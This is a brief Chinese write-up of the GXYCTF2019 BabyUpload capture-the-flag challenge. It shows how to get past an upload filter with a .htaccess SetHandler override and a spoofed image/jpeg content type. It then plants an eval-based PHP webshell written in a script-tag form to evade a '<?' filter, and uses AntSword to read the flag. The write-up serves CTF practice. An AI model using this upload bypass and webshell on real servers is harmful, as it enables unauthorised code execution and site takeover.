[GXYCTF2019]BabyUpload
1,先上传个php文件试试,提示后缀名不能有ph
2,上传个.htaccess文件试试,提示上传类型也太露骨了吧
.hatccess文件内容:
SetHandler application/x-httpd-php
3,换个文件类型,换成image/jpeg,上传成功!
接下来只需要上传一个带有一句话木马的png/jpg文件就行。
- (。。还有)对文件内容进行了过滤,猜测过滤了
<?
6,可以使用<script language="php">eval($_POST['mochu7']);</script>绕过
7,上传成功,链接蚁剑获得flag